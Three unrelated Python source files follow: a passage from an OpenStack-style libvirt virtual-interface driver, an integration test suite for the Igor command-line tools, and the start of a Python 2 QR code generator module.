virt_type,
host)
def get_config_ivs_hybrid(self, instance, vif, image_meta,
inst_type, virt_type, host):
newvif = copy.deepcopy(vif)
newvif['network']['bridge'] = self.get_br_name(vif['id'])
return self.get_config_bridge(instance,
newvif,
image_meta,
inst_type,
virt_type,
host)
def get_config_ivs_ethernet(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance,
vif,
image_meta,
inst_type,
virt_type)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev)
return conf
def get_config_ivs(self, instance, vif, image_meta,
inst_type, virt_type, host):
if self.get_firewall_required(vif) or vif.is_hybrid_plug_enabled():
return self.get_config_ivs_hybrid(instance, vif,
image_meta,
inst_type,
virt_type,
host)
else:
return self.get_config_ivs_ethernet(instance, vif,
image_meta,
inst_type,
virt_type,
host)
def get_config_802qbg(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
params = vif["qbg_params"]
designer.set_vif_host_backend_802qbg_config(
conf, vif['network'].get_meta('interface'),
params['managerid'],
params['typeid'],
params['typeidversion'],
params['instanceid'])
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_802qbh(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
profile = vif["profile"]
vif_details = vif["details"]
net_type = 'direct'
if vif['vnic_type'] == network_model.VNIC_TYPE_DIRECT:
net_type = 'hostdev'
designer.set_vif_host_backend_802qbh_config(
conf, net_type, profile['pci_slot'],
vif_details[network_model.VIF_DETAILS_PROFILEID])
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_hw_veb(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
profile = vif["profile"]
vif_details = vif["details"]
net_type = 'direct'
if vif['vnic_type'] == network_model.VNIC_TYPE_DIRECT:
net_type = 'hostdev'
designer.set_vif_host_backend_hw_veb(
conf, net_type, profile['pci_slot'],
vif_details[network_model.VIF_DETAILS_VLAN])
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_macvtap(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
vif_details = vif['details']
macvtap_src = vif_details.get(network_model.VIF_DETAILS_MACVTAP_SOURCE)
macvtap_mode = vif_details.get(network_model.VIF_DETAILS_MACVTAP_MODE)
phys_interface = vif_details.get(
network_model.VIF_DETAILS_PHYS_INTERFACE)
missing_params = []
if macvtap_src is None:
missing_params.append(network_model.VIF_DETAILS_MACVTAP_SOURCE)
if macvtap_mode is None:
missing_params.append(network_model.VIF_DETAILS_MACVTAP_MODE)
if phys_interface is None:
missing_params.append(network_model.VIF_DETAILS_PHYS_INTERFACE)
if len(missing_params) > 0:
raise exception.VifDetailsMissingMacvtapParameters(
vif_id=vif['id'],
missing_params=missing_params)
designer.set_vif_host_backend_direct_config(
conf, macvtap_src, macvtap_mode)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_iovisor(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_midonet(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev)
return conf
def get_config_tap(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev)
return conf
def get_config_mlnx_direct(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
devname = self.get_vif_devname_with_prefix(vif, DEV_PREFIX_ETH)
designer.set_vif_host_backend_direct_config(conf, devname)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_vhostuser(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
vif_details = vif['details']
mode = vif_details.get(network_model.VIF_DETAILS_VHOSTUSER_MODE,
'server')
sock_path = vif_details.get(network_model.VIF_DETAILS_VHOSTUSER_SOCKET)
if sock_path is None:
raise exception.VifDetailsMissingVhostuserSockPath(
vif_id=vif['id'])
designer.set_vif_host_backend_vhostuser_config(conf, mode, sock_path)
# (vladikr) Not setting up driver and queues for vhostuser
# as queues are not supported in Libvirt until version 1.2.17
if not host.has_min_version(MIN_LIBVIRT_VHOSTUSER_MQ):
LOG.debug('Queues are not a vhostuser supported feature.')
conf.driver_name = None
conf.vhost_queues = None
return conf
def get_config_ib_hostdev(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = vconfig.LibvirtConfigGuestHostdevPCI()
pci_slot = vif['profile']['pci_slot']
designer.set_vif_host_backend_ib_hostdev_config(conf, pci_slot)
return conf
def get_config_vrouter(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config(self, instance, vif, image_meta,
inst_type, virt_type, host):
vif_type = vif['type']
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s virt_type%(virt_type)s',
{'vif_type': vif_type, 'instance': instance,
'vif': vif, 'virt_type': virt_type})
if vif_type is None:
raise exception.NovaException(
_("vif_type parameter must be present "
"for this vif_driver implementation"))
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'get_config_%s' % vif_slug, None)
if not func:
raise exception.NovaException(
_("Unexpected vif_type=%s") % vif_type)
return func(instance, vif, image_meta,
inst_type, virt_type, host)
def plug_bridge(self, instance, vif):
"""Ensure that the bridge exists, and add VIF to it."""
network = vif['network']
if (not network.get_meta('multi_host', False) and
network.get_meta('should_create_bridge', False)):
if network.get_meta('should_create_vlan', False):
iface = CONF.vlan_interface or \
network.get_meta('bridge_interface')
LOG.debug('Ensuring vlan %(vlan)s and bridge %(bridge)s',
{'vlan': network.get_meta('vlan'),
'bridge': self.get_bridge_name(vif)},
instance=instance)
linux_net.LinuxBridgeInterfaceDriver.ensure_vlan_bridge(
network.get_meta('vlan'),
self.get_bridge_name(vif),
iface)
else:
iface = CONF.flat_interface or \
network.get_meta('bridge_interface')
LOG.debug("Ensuring bridge %s",
self.get_bridge_name(vif), instance=instance)
linux_net.LinuxBridgeInterfaceDriver.ensure_bridge(
self.get_bridge_name(vif),
iface)
def plug_ovs_bridge(self, instance, vif):
"""No manual plugging required."""
pass
def _plug_bridge_with_port(self, instance, vif, port):
iface_id = self.get_ovs_interfaceid(vif)
br_name = self.get_br_name(vif['id'])
v1_name, v2_name = self.get_veth_pair_names(vif['id'])
if not linux_net.device_exists(br_name):
utils.execute('brctl', 'addbr', br_name, run_as_root=True)
utils.execute('brctl', 'setfd', br_name, 0, run_as_root=True)
utils.execute('brctl', 'stp', br_name, 'off', run_as_root=True)
utils.execute('tee',
('/sys/class/net/%s/bridge/multicast_snooping' %
br_name),
process_input='0',
run_as_root=True,
check_exit_code=[0, 1])
disv6 = '/proc/sys/net/ipv6/conf/%s/disable_ipv6' % br_name
if os.path.exists(disv6):
utils.execute('tee',
disv6,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
if not linux_net.device_exists(v2_name):
linux_net._create_veth_pair(v1_name, v2_name)
utils.execute('ip', 'link', 'set', br_name, 'up', run_as_root=True)
utils.execute('brctl', 'addif', br_name, v1_name, run_as_root=True)
if port == 'ovs':
linux_net.create_ovs_vif_port(self.get_bridge_name(vif),
v2_name, iface_id,
vif['address'], instance.uuid)
elif port == 'ivs':
linux_net.create_ivs_vif_port(v2_name, iface_id,
vif['address'], instance.uuid)
def plug_ovs_hybrid(self, instance, vif):
"""Plug using hybrid strategy
Create a per-VIF linux bridge, then link that bridge to the OVS
integration bridge via a veth device, setting up the other end
of the veth device just like a normal OVS port. Then boot the
VIF on the linux bridge using standard libvirt mechanisms.
"""
self._plug_bridge_with_port(instance, vif, port='ovs')
def plug_ovs(self, instance, vif):
if self.get_firewall_required(vif) or vif.is_hybrid_plug_enabled():
self.plug_ovs_hybrid(instance, vif)
else:
self.plug_ovs_bridge(instance, vif)
def plug_ivs_ethernet(self, instance, vif):
iface_id = self.get_ovs_interfaceid(vif)
dev = self.get_vif_devname(vif)
linux_net.create_tap_dev(dev)
linux_net.create_ivs_vif_port(dev, iface_id, vif['address'],
instance.uuid)
def plug_ivs_hybrid(self, instance, vif):
"""Plug using hybrid strategy (same as OVS)
Create a per-VIF linux bridge, then link that bridge to the OVS
integration bridge via a veth device, setting up the other end
of the veth device just like a normal IVS port. Then boot the
VIF on the linux bridge using standard libvirt mechanisms.
"""
self._plug_bridge_with_port(instance, vif, port='ivs')
def plug_ivs(self, instance, vif):
if self.get_firewall_required(vif) or vif.is_hybrid_plug_enabled():
self.plug_ivs_hybrid(instance, vif)
else:
self.plug_ivs_ethernet(instance, vif)
def plug_mlnx_direct(self, instance, vif):
vnic_mac = vif['address']
device_id = instance.uuid
fabric = vif.get_physical_network()
if not fabric:
raise exception.NetworkMissingPhysicalNetwork(
network_uuid=vif['network']['id'])
dev_name = self.get_vif_devname_with_prefix(vif, DEV_PREFIX_ETH)
try:
utils.execute('ebrctl', 'add-port', vnic_mac, device_id, fabric,
network_model.VIF_TYPE_MLNX_DIRECT, dev_name,
run_as_root=True)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while plugging vif"), instance=instance)
def plug_ib_hostdev(self, instance, vif):
fabric = vif.get_physical_network()
if not fabric:
raise exception.NetworkMissingPhysicalNetwork(
network_uuid=vif['network']['id']
)
pci_slot = vif['profile']['pci_slot']
device_id = instance['uuid']
vnic_mac = vif['address']
try:
utils.execute('ebrctl', 'add-port', vnic_mac, device_id,
fabric, network_model.VIF_TYPE_IB_HOSTDEV,
pci_slot, run_as_root=True)
except processutils.ProcessExecutionError:
LOG.exception(
_LE("Failed while plugging ib hostdev vif"),
instance=instance
)
def plug_802qbg(self, instance, vif):
pass
def plug_802qbh(self, instance, vif):
pass
def plug_hw_veb(self, instance, vif):
if vif['vnic_type'] == network_model.VNIC_TYPE_MACVTAP:
linux_net.set_vf_interface_vlan(
vif['profile']['pci_slot'],
mac_addr=vif['address'],
vlan=vif['details'][network_model.VIF_DETAILS_VLAN])
def plug_macvtap(self, instance, vif):
vif_details = vif['details']
vlan = vif_details.get(network_model.VIF_DETAILS_VLAN)
if vlan:
vlan_name = vif_details.get(
network_model.VIF_DETAILS_MACVTAP_SOURCE)
phys_if = vif_details.get(network_model.VIF_DETAILS_PHYS_INTERFACE)
linux_net.LinuxBridgeInterfaceDriver.ensure_vlan(
vlan, phys_if, interface=vlan_name)
def plug_midonet(self, instance, vif):
"""Plug into MidoNet's network port
Bind the vif to a MidoNet virtual port.
"""
dev = self.get_vif_devname(vif)
port_id = vif['id']
try:
linux_net.create_tap_dev(dev)
utils.execute('mm-ctl', '--bind-port', port_id, dev,
run_as_root=True)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while plugging vif"), instance=instance)
def plug_iovisor(self, instance, vif):
"""Plug using PLUMgrid IO Visor Driver
Connect a network device to their respective
Virtual Domain in PLUMgrid Platform.
"""
dev = self.get_vif_devname(vif)
iface_id = vif['id']
linux_net.create_tap_dev(dev)
net_id = vif['network']['id']
tenant_id = instance.project_id
try:
utils.execute('ifc_ctl', 'gateway', 'add_port', dev,
run_as_root=True)
utils.execute('ifc_ctl', 'gateway', 'ifup', dev,
'access_vm',
vif['network']['label'] + "_" + iface_id,
vif['address'], 'pgtag2=%s' % net_id,
'pgtag1=%s' % tenant_id, run_as_root=True)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while plugging vif"), instance=instance)
def plug_tap(self, instance, vif):
"""Plug a VIF_TYPE_TAP virtual interface."""
dev = self.get_vif_devname(vif)
mac = vif['details'].get(network_model.VIF_DETAILS_TAP_MAC_ADDRESS)
linux_net.create_tap_dev(dev, mac)
linux_net._set_device_mtu(dev)
def plug_vhostuser(self, instance, vif):
ovs_plug = vif['details'].get(
network_model.VIF_DETAILS_VHOSTUSER_OVS_PLUG,
False)
if ovs_plug:
iface_id = self.get_ovs_interfaceid(vif)
port_name = os.path.basename(
vif['details'][network_model.VIF_DETAILS_VHOSTUSER_SOCKET])
linux_net.create_ovs_vif_port(self.get_bridge_name(vif),
port_name, iface_id, vif['address'],
instance.uuid)
linux_net.ovs_set_vhostuser_port_type(port_name)
def plug_vrouter(self, instance, vif):
"""Plug into Contrail's network port
Bind the vif to a Contrail virtual port.
"""
dev = self.get_vif_devname(vif)
ip_addr = '0.0.0.0'
ip6_addr = None
subnets = vif['network']['subnets']
for subnet in subnets:
if not subnet['ips']:
continue
ips = subnet['ips'][0]
if not ips['address']:
continue
if (ips['version'] == 4):
if ips['address'] is not None:
ip_addr = ips['address']
if (ips['version'] == 6):
if ips['address'] is not None:
ip6_addr = ips['address']
ptype = 'NovaVMPort'
if (cfg.CONF.libvirt.virt_type == 'lxc'):
ptype = 'NameSpacePort'
cmd_args = ("--oper=add --uuid=%s --instance_uuid=%s --vn_uuid=%s "
"--vm_project_uuid=%s --ip_address=%s --ipv6_address=%s"
" --vm_name=%s --mac=%s --tap_name=%s --port_type=%s "
"--tx_vlan_id=%d --rx_vlan_id=%d" % (vif['id'],
instance.uuid, vif['network']['id'],
instance.project_id, ip_addr, ip6_addr,
instance.display_name, vif['address'],
vif['devname'], ptype, -1, -1))
try:
linux_net.create_tap_dev(dev)
utils.execute('vrouter-port-control', cmd_args, run_as_root=True)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while plugging vif"), instance=instance)
def plug(self, instance, vif):
vif_type = vif['type']
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s',
{'vif_type': vif_type, 'instance': instance,
'vif': vif})
if vif_type is None:
raise exception.VirtualInterfacePlugException(
_("vif_type parameter must be present "
"for this vif_driver implementation"))
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'plug_%s' % vif_slug, None)
if not func:
raise exception.VirtualInterfacePlugException(
_("Plug vif failed because of unexpected "
"vif_type=%s") % vif_type)
func(instance, vif)
def unplug_bridge(self, instance, vif):
"""No manual unplugging required."""
pass
def unplug_ovs_bridge(self, instance, vif):
"""No manual unplugging required."""
pass
def unplug_ovs_hybrid(self, instance, vif):
"""UnPlug using hybrid strategy
Unhook port from OVS, unhook port from bridge, delete
bridge, and delete both veth devices.
"""
try:
br_name = self.get_br_name(vif['id'])
v1_name, v2_name = self.get_veth_pair_names(vif['id'])
if linux_net.device_exists(br_name):
utils.execute('brctl', 'delif', br_name, v1_name,
run_as_root=True)
utils.execute('ip', 'link', 'set', br_name, 'down',
run_as_root=True)
utils.execute('brctl', 'delbr', br_name,
run_as_root=True)
linux_net.delete_ovs_vif_port(self.get_bridge_name(vif),
v2_name)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while unplugging vif"),
instance=instance)
def unplug_ovs(self, instance, vif):
if self.get_firewall_required(vif) or vif.is_hybrid_plug_enabled():
self.unplug_ovs_hybrid(instance, vif)
else:
self.unplug_ovs_bridge(instance, vif)
def unplug_ivs_ethernet(self, instance, vif):
"""Unplug the VIF by deleting the port from the bridge."""
try:
linux_net.delete_ivs_vif_port(self.get_vif_devname(vif))
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while unplugging vif"),
instance=instance)
def unplug_ivs_hybrid(self, instance, vif):
"""UnPlug using hybrid strategy (same as OVS)
Unhook port from IVS, unhook port from bridge, delete
bridge, and delete both veth devices.
"""
try:
br_name = self.get_br_name(vif['id'])
v1_name, v2_name = self.get_veth_pair_names(vif['id'])
utils.execute('brctl', 'delif', br_name, v1_name, run_as_root=True)
utils.execute('ip', 'link', 'set', br_name, 'down',
run_as_root=True)
utils.execute('brctl', 'delbr', br_name, run_as_root=True)
linux_net.delete_ivs_vif_port(v2_name)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while unplugging vif"),
instance=instance)
def unplug_ivs(self, instance, vif):
if self.get_firewall_required(vif) or vif.is_hybrid_plug_enabled():
self.unplug_ivs_hybrid(instance, vif)
else:
self.unplug_ivs_ethernet(instance, vif)
def unplug_mlnx_direct(self, instance, vif):
vnic_mac = vif['address']
fabric = vif.get_physical_network()
if not fabric:
raise exception.NetworkMissingPhysicalNetwork(
network_uuid=vif['network']['id'])
try:
utils.execute('ebrctl', 'del-port', fabric,
vnic_mac, run_as_root=True)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while unplugging vif"),
instance=instance)
def unplug_ib_hostdev(self, instance, vif):
fabric = vif.get_physical_network()
if not fabric:
raise exception.NetworkMissingPhysicalNetwork(
network_uuid=vif['network']['id']
)
vnic_mac = vif['address']
try:
utils.execute('ebrctl', 'del-port', fabric, vnic_mac,
run_as_root=True)
except Exception:
LOG.exception(_LE("Failed while unplugging ib hostdev vif"))
def unplug_802qbg(self, instance, vif):
pass
def unplug_802qbh(self, instance, vif):
pass
def unplug_hw_veb(self, instance, vif):
if vif['vnic_type'] == network_model.VNIC_TYPE_MACVTAP:
# The ip utility doesn't accept the MAC 00:00:00:00:00:00.
# Therefore, keep the MAC unchanged. Later operations on
# the same VF will not be affected by the existing MAC.
linux_net.set_vf_interface_vlan(vif['profile']['pci_slot'],
mac_addr=vif['address'])
def unplug_macvtap(self, instance, vif):
pass
def unplug_midonet(self, instance, vif):
"""Unplug from MidoNet network port
Unbind the vif from a MidoNet virtual port.
"""
dev = self.get_vif_devname(vif)
port_id = vif['id']
try:
utils.execute('mm-ctl', '--unbind-port', port_id,
run_as_root=True)
linux_net.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while unplugging vif"),
instance=instance)
def unplug_tap(self, instance, vif):
"""Unplug a VIF_TYPE_TAP virtual interface."""
dev = self.get_vif_devname(vif)
try:
linux_net.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while unplugging vif"),
instance=instance)
def unplug_iovisor(self, instance, vif):
"""Unplug using PLUMgrid IO Visor Driver
Delete network device and to their respective
connection to the Virtual Domain in PLUMgrid Platform.
"""
iface_id = vif['id']
dev = self.get_vif_devname(vif)
try:
utils.execute('ifc_ctl', 'gateway', 'ifdown',
dev, 'access_vm',
vif['network']['label'] + "_" + iface_id,
vif['address'], run_as_root=True)
utils.execute('ifc_ctl', 'gateway', 'del_port', dev,
run_as_root=True)
linux_net.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while unplugging vif"),
instance=instance)
def unplug_vhostuser(self, instance, vif):
ovs_plug = vif['details'].get(
network_model.VIF_DETAILS_VHOSTUSER_OVS_PLUG,
False)
if ovs_plug:
port_name = os.path.basename(
vif['details'][network_model.VIF_DETAILS_VHOSTUSER_SOCKET])
linux_net.delete_ovs_vif_port(self.get_bridge_name(vif),
port_name)
def unplug_vrouter(self, instance, vif):
"""Unplug Contrail's network port
Unbind the vif from a Contrail virtual port.
"""
dev = self.get_vif_devname(vif)
cmd_args = ("--oper=delete --uuid=%s" % (vif['id']))
try:
utils.execute('vrouter-port-control', cmd_args, run_as_root=True)
linux_net.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(
_LE("Failed while unplugging vif"), instance=instance)
def unplug(self, instance, vif):
vif_type = vif['type']
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s',
{'vif_type': vif_type, 'instance': instance,
'vif': vif})
if vif_type is None:
raise exception.NovaException(
_("vif_type parameter must be present "
"for this vif_driver implementation"))
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'unplug_%s' % vif_slug, None)
if not func:
raise exception.NovaException(
_("Unexpected vif_type=%s") % vif_type)
func(instance, vif)
| |
import unittest
import os
import sys
import socket
import shutil
import subprocess
import time
FIXTURES=os.path.join(os.path.abspath(os.path.dirname(__file__)), 'fixtures')
class IgorCmdlineTest(unittest.TestCase):
igorDir = os.path.join(FIXTURES, 'testIgorCmd')
igorHostname=socket.gethostname()
igorHostname2='localhost'
igorPort = 49333
igorProtocol = "https"
igorVarArgs = {}
igorUseCapabilities = False
credentials = ['--credentials', 'admin:']
processes = []
@classmethod
def setUpClass(cls):
shutil.rmtree(cls.igorDir, True)
try:
os.unlink(os.path.join(FIXTURES, 'test_igor_cmdline.log'))
except:
pass
cls.igorUrl = "%s://%s:%d/data/" % (cls.igorProtocol, cls.igorHostname, cls.igorPort)
@classmethod
def tearDownClass(cls):
time.sleep(5)
for proc in cls.processes:
if proc.poll() == None:
print('Warning: process has not terminated, killing it:', proc)
proc.terminate()
proc.wait()
def _runCommand(self, command, options, *args):
logFile = os.path.join(FIXTURES, 'test_igor_cmdline.log')
if 'IGOR_TEST_PYTHON' in os.environ:
cmdHead = [os.environ['IGOR_TEST_PYTHON']]
else:
cmdHead = [sys.executable]
cmd = cmdHead + ["-m", command] # "igor", "--nologstderr", "--check", "--database", self.igorDir, "--port", str(selg.igorPort)]
if 'addDir' in options:
cmd += ["-d", self.igorDir]
if 'addUrl' in options:
cmd += ["-u", self.igorUrl]
if 'addPort' in options:
cmd += ["-p", str(self.igorPort)]
if 'addCredentials' in options:
cmd += self.credentials
certFileName = os.path.join(self.igorDir, "igor.crt")
if os.path.exists(certFileName):
cmd += ["--certificate", certFileName]
cmd += list(args)
with open(logFile, 'a') as logFP:
print('+', ' '.join(cmd), file=logFP)
logFP.flush()
if 'read' in options:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=logFP, universal_newlines=True)
rv = proc.communicate()
proc.wait()
return rv[0]
elif 'async' in options:
proc = subprocess.Popen(cmd, stdout=logFP, stderr=subprocess.STDOUT)
self.processes.append(proc)
return 0
else:
return subprocess.call(cmd, stdout=logFP, stderr=subprocess.STDOUT)
def test_200_igorServer_help(self):
"""check igorServer --help"""
data = self._runCommand("igor", {"read"}, "--help")
self.assertIn("show this help message", data)
def test_201_igorSetup_help(self):
"""check igorSetup --help"""
data = self._runCommand("igorSetup", {"read"}, "--help")
self.assertIn("show this help message", data)
def test_202_igorControl_help(self):
"""check igorControl --help"""
data = self._runCommand("igorControl", {"read"}, "--help")
self.assertIn("show this help message", data)
def test_203_igorVar_help(self):
"""check igorVar --help"""
data = self._runCommand("igorVar", {"read"}, "--help")
self.assertIn("show this help message", data)
def test_204_igorCA_help(self):
"""check igorCA --help"""
data = self._runCommand("igorCA", {"read"}, "--help")
self.assertIn("show this help message", data)
def test_205_igorServlet_help(self):
"""check igorServlet --help"""
data = self._runCommand("igorServlet", {"read"}, "--help")
self.assertIn("show this help message", data)
def test_206_igorSetup_helpcmd(self):
"""check igorSetup help"""
data = self._runCommand("igorSetup", {"read"}, "help")
self.assertIn("help - this message", data)
def test_207_igorCA_helpcmd(self):
"""check igorCA help"""
data = self._runCommand("igorCA", {"read"}, "help")
self.assertIn("Show list of available commands", data)
#
# NOTE: these are integration tests, not really unittests. From here on the
# tests need to be run in order.
#
def test_210_igorSetup_initialize(self):
"""Initialize database"""
sts = self._runCommand("igorSetup", {"addDir"}, "initialize")
self.assertEqual(sts, 0)
def test_211_igorSetup_addstd(self):
"""Add standard plugin"""
sts = self._runCommand("igorSetup", {"addDir"}, "addstd", "systemHealth")
self.assertEqual(sts, 0)
def test_212_igorSetup_liststd(self):
"""list standard plugins"""
sts = self._runCommand("igorSetup", {"addDir"}, "liststd")
self.assertEqual(sts, 0)
def test_213_igorSetup_list(self):
"""list installed plugins"""
sts = self._runCommand("igorSetup", {"addDir"}, "list")
self.assertEqual(sts, 0)
def test_220_igorSetup_certificateSelfsigned(self):
"""Create self-signed certificate for igor"""
if self.igorProtocol == "http":
raise unittest.SkipTest("no https support tested")
sts = self._runCommand("igorSetup", {"addDir"}, "--run", "certificateSelfsigned", "/CN=%s" % self.igorHostname, self.igorHostname, "localhost", "127.0.0.1")
self.assertEqual(sts, 0)
def test_230_start_igor(self):
"""Start the igor server"""
sts = self._runCommand("igor", {"addDir", "addPort", "async"})
time.sleep(5)
self.assertEqual(sts, 0)
def test_241_igorControl_helpcmd(self):
"""Try the igorControl help command"""
data = self._runCommand("igorControl", {"addUrl", "addCredentials", "data", "read"}, "help")
self.assertIn("Show list of all internal commands", data)
def test_242_igorControl_save(self):
"""Try the igorControl save command"""
sts = self._runCommand("igorControl", {"addUrl", "addCredentials"}, "save")
self.assertEqual(sts, 0)
def test_243_igorControl_dump(self):
"""Try the igorControl dump command"""
sts = self._runCommand("igorControl", {"addUrl", "addCredentials"}, "dump")
self.assertEqual(sts, 0)
def test_244_igorControl_log(self):
"""Try the igorControl log command"""
sts = self._runCommand("igorControl", {"addUrl", "addCredentials"}, "log")
self.assertEqual(sts, 0)
def test_245_igorControl_flush(self):
"""Try the igorControl flush command"""
sts = self._runCommand("igorControl", {"addUrl", "addCredentials"}, "flush")
self.assertEqual(sts, 0)
def test_251_igorVar_put_text(self):
"""Use igorVar to put a text/plain value"""
sts = self._runCommand("igorVar", {"addUrl", "addCredentials"}, "--put", "text/plain", "--data", "text data", "sandbox/text")
self.assertEqual(sts, 0)
def test_252_igorVar_put_json(self):
"""Use igorVar to put a application/json value"""
sts = self._runCommand("igorVar", {"addUrl", "addCredentials"}, "--put", "application/json", "--data", '{"json" : "json data"}', "sandbox/json")
self.assertEqual(sts, 0)
def test_253_igorVar_put_xml(self):
"""Use igorVar to put a application/xml value"""
sts = self._runCommand("igorVar", {"addUrl", "addCredentials"}, "--put", "application/xml", "--data", "<xml>xml data</xml>", "sandbox/xml")
self.assertEqual(sts, 0)
def test_254_igorVar_post_text(self):
"""Use igorVar to post two text/plain values"""
sts = self._runCommand("igorVar", {"addUrl", "addCredentials"}, "--post", "text/plain", "--data", "first post text", "sandbox/posttext")
self.assertEqual(sts, 0)
sts = self._runCommand("igorVar", {"addUrl", "addCredentials"}, "--post", "text/plain", "--data", "second post text", "sandbox/posttext")
self.assertEqual(sts, 0)
def test_261_igorVar_get_text(self):
"""Use igorVar to get a plaintext value for all three values stored above"""
data = self._runCommand("igorVar", {"addUrl", "addCredentials", "read"}, "--mimetype", "text/plain", "sandbox/text")
self.assertIn("text data", data)
data = self._runCommand("igorVar", {"addUrl", "addCredentials", "read"}, "--mimetype", "text/plain", "sandbox/json")
self.assertIn("json data", data)
data = self._runCommand("igorVar", {"addUrl", "addCredentials", "read"}, "--mimetype", "text/plain", "sandbox/xml")
self.assertIn("xml data", data)
data = self._runCommand("igorVar", {"addUrl", "addCredentials", "read"}, "--mimetype", "text/plain", "sandbox/posttext")
self.assertIn("first post text", data)
self.assertIn("second post text", data)
def test_299_stop_igor(self):
"""Try the igorControl stop command"""
sts = self._runCommand("igorControl", {"addUrl", "addCredentials"}, "stop")
self.assertEqual(sts, 0)
if __name__ == '__main__':
unittest.main()
| |
#
# pyqrcode.py
#
# David Janes
# Discover Anywhere Mobile
# 2010-11-25
#
# This is a fork of QRCode for Python
#
# qrcode = pyqrcode.QRCode.Make(URL)
# image = qrcode.make_image()
#
#
import math
from PIL import Image, ImageDraw
#QRCode for Python
#
#Ported from the Javascript library by Sam Curren
#
#QRCode for Javascript
#http://d-project.googlecode.com/svn/trunk/misc/qrcode/js/qrcode.js
#
#Copyright (c) 2009 Kazuhiko Arase
#
#URL: http://www.d-project.com/
#
#Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# The word "QR Code" is registered trademark of
# DENSO WAVE INCORPORATED
# http://www.denso-wave.com/qrcode/faqpatent-e.html
class QRMode:
MODE_NUMBER = 1 << 0
MODE_ALPHA_NUM = 1 << 1
MODE_8BIT_BYTE = 1 << 2
MODE_KANJI = 1 << 3
class QRErrorCorrectLevel:
L = 1
M = 0
Q = 3
H = 2
class CodeLengthOverflowError(Exception):
def __init__(self, bits, maxbits):
self.bits = bits
self.maxbits = maxbits
def __str__(self):
return "CodeLengthOverflowError(bits=%d,maxbits=%d)" % ( self.bits, self.maxbits, )
class QR8bitByte:
def __init__(self, data):
self.mode = QRMode.MODE_8BIT_BYTE
self.data = data
def getLength(self):
return len(self.data)
def write(self, buffer):
for i in range(len(self.data)):
#// not JIS ...
buffer.put(ord(self.data[i]), 8)
def __repr__(self):
return self.data
VERBOSE = False
def MakeQR(data, minTypeNumber = 0, errorCorrectLevel = QRErrorCorrectLevel.Q, verbose = False):
"""This tries to produce a reasonable QR Code"""
#
# Try and guess the level ... this is only written for Q
# so probably overestimates
#
if minTypeNumber == 0:
bits_needed = ( len(data) + 1 ) * 8
minTypeNumber = ( bits_needed + 50 ) / 100
minTypeNumber = int(minTypeNumber)
for x in xrange(0, 50):
try:
qr = QRCode(minTypeNumber + x, errorCorrectLevel)
qr.addData(data)
qr.make()
return qr
except CodeLengthOverflowError, x:
if VERBOSE:
print >> sys.stderr, "QRCode.Make - bad guess - trying again", x
continue
def MakeQRImage(data, minTypeNumber = 0, errorCorrectLevel = QRErrorCorrectLevel.Q, **ad):
"""This tries to produce a reasonable QR Code ... and returns the image"""
qr = MakeQR(data, minTypeNumber, errorCorrectLevel)
qr_image = qr.make_image(**ad)
return qr_image
class QRCode(object):
def __init__(self, typeNumber, errorCorrectLevel):
self.typeNumber = typeNumber
self.errorCorrectLevel = errorCorrectLevel
self.modules = None
self.moduleCount = 0
